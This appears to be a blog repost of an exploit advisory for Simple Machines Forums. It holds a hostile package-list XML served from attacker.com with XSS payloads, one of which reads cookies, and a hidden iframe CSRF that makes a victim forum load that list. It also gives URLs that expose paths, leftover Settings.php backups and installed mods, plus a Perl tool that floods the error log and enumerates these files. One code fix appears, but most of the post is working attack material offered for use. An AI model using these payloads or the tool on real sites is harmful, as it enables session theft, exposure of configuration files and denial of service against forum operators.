lo posteo tal cual lo envie a milw0rm :)..

0days jejje

Author: Xianur0
Affected Versions: All
Vendors: Simple Machine Forums
Vendors Webpage: http://www.simplemachines.org/

XSRF PoC (http://attacker.com/packages.xml):


<?xml version="1.0"?>
<!DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list">
<!-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
XSRF PoC By Xianur0
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -->

<package-list xmlns="http://www.simplemachines.org/xml/package-list" xmlns:smf="http://www.simplemachines.org/">
<list-title>Xianur0 Was Here</list-title>

<section>
<title>SMF XSS PoC By Xianur0</title>
<text><![CDATA[<script>alert('XSS')</script>]]></text>
<modification>
<id>Xianur0:XSMF</id>
<name>SMF PoC By Xianur0</name>
<filename>smfexploit.zip</filename>
<version>0.1</version>
<author email="uxmal666@gmail.com">Xianur0</author>
<description><![CDATA[<script>alert(document.cookie)</script>]]></description>
</modification>
</section>
</package-list>



XSRF:

Código:


<iframe src ="http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com" width="0%" scrolling=no width=0%></iframe>





Others Details:

The Log Errors basically keeps any minimum error caused by users, good and if it saturated?

http://www.web.com/foro/index.php?action=help;page[]=loginout
(Full path disclosure)
This created a record of error in the log:

2: Illegal offset type in isset or empty
File: /var/www/xxxxxxxxxxxxxx.com/htdocs/Sources/Help.php
Line: 65
?action=help;page[]=loginout


This error is in Sources/Help.php on line 65:



if (!isset($_GET['page']) || !isset($context['all_pages'][$
_GET['page']]))
$_GET['page'] = 'index';




Correction:

Código:


if (!is_array($_GET['page']) && !isset($_GET['page']) || !is_array($_GET['page']) && !isset($context['all_pages'][$_GET['page']]))
$_GET['page'] = 'index';



Errors handling packages:

Error handling packages for temporary, the SMF to upload a mod and run it makes a backup of each PHP file that is touched, but at the end of the amendment, not erased, then this can be accessed by any other user:

http://www.victima.com/index.php~
http://www.victima.com/Settings.php~

Error leaves Files:
Some of the SMF files are not protected as they should, for example:

http://www.victima.com/Packages/installed.list

This can be used for scan packet (many packets that are sent to SMF have security flaws such as XSS, SQL Inyection and in some cases RFI)

Getting Directory installation of SMF (useful for attacking free hostings)

http://www.victima.com/SSI.php?ssi_layers

Result:

Notice: Undefined variable: ssi_layers in/home/web/public_html/forum/SSI.php on line 99
Hacking attempt ...


It also serves to create heavy logs as these mistakes are stored directly on:

http://www.victima.com/error_log


Tool:


#!/usr/bin/perl

use LWP::UserAgent;
use Getopt::Std;


my $url = $ARGV[1] || die ("Use: smf.pl [Full URL] [option]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l Installed Mods List \n-b Find Temporary\n");


$ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');

getopts('fplb', \%opt);
flood() if $opt{f};
path() if $opt{p};
list() if $opt{l};
temp() if $opt{b};

sub headers {
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
}

sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
my @htmls = split('Undefined variable: ssi_layers in <b>', $html);
my @htmls = split('SSI.php</b>', $htmls[1]);
if($htmls[0] ne "") { print "Directory: $htmls[0]\n"; } else { print "Getting error Directory!\n";}
}
}

sub flood {
print "Starting Flood! (Press Ctrl + C To Finish)\n";
$texto = "Flood!!!!!" x 15;
$req = HTTP::Request->new(GET => $url.'/index.php?action=help;page['.$texto.']=loginout');
&headers;
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print "Sent: ".$i."\n";
} else {
print "HTTP Error Query: " . $res->status_line . "\n";
}
}
}


sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url."/".$temp);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
print "Temporary File Found: ".$url."/".$temp."\n";
}
}
}

sub list {
$req = HTTP::Request->new(GET => $url."/Packages/installed.list");
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
my @htmls = split("\n", $html);
foreach $mod (@htmls) {
my @mod = split('\|\^\|', $mod);
print "Description: $mod[0]\nFile: $url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n";

}
}
}

0 comentarios: